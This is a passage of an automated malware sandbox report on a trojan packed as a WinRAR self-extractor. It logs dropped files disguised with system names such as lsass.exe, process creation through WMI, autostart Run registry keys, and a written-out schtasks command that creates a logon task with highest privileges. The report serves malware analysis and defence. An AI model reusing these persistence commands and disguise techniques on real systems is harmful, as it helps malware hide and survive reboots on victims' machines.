            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\refhostperfdllCommonsessionnetsvc.exe.logJump to behavior
            Source: classification engineClassification label: mal92.troj.winEXE@18/12@0/1
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_01006EC9 GetLastError,FormatMessageW,
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeMutant created: \Sessions\1\BaseNamedObjects\3c2a2cbcf247c3c8a64f86b3e45480d00bfbb70f
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_01
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_01019E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCommand line argument: sfxname
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCommand line argument: sfxstime
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCommand line argument: STARTDLG
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\refhostperfdllCommon\rSX3yp.bat" "
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic file information: File size 1322142 > 1048576
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0101E28C push eax; ret
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0101ED46 push ecx; ret
            Source: 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeFile created: C:\refhostperfdllCommon\__tmp_rar_sfx_access_check_6179171Jump to behavior

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Drops PE files with benign system namesShow sources
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeFile created: C:\Users\user\Pictures\Camera Roll\lsass.exeJump to dropped file
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeFile created: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeJump to dropped file
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeFile created: C:\Windows\System32\umdmxfrm\backgroundTaskHost.exeJump to dropped file
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeFile created: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeJump to dropped file
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeFile created: C:\Users\user\Pictures\Camera Roll\lsass.exeJump to dropped file
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeFile created: C:\Windows\System32\umdmxfrm\backgroundTaskHost.exeJump to dropped file

            Boot Survival:

            barindex
            Creates an autostart registry key pointing to binary in C:\WindowsShow sources
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
            Creates multiple autostart registry keysShow sources
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wjIuhVBtfHXnMCZlWDojJump to behavior
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsassJump to behavior
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wjIuhVBtfHXnMCZlWDoj" /sc ONLOGON /tr "'C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe'" /rl HIGHEST /f
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wjIuhVBtfHXnMCZlWDojJump to behavior
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wjIuhVBtfHXnMCZlWDojJump to behavior
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsassJump to behavior
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lsassJump to behavior
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe TID: 6676Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe TID: 6208Thread sleep time: -922337203685477s >= -30000s
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe TID: 1620Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exe TID: 3716Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe TID: 5700Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeThread delayed: delay time: 922337203685477
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeThread delayed: delay time: 922337203685477
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeThread delayed: delay time: 922337203685477
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0101DD72 VirtualQuery,GetSystemInfo,
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0100A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
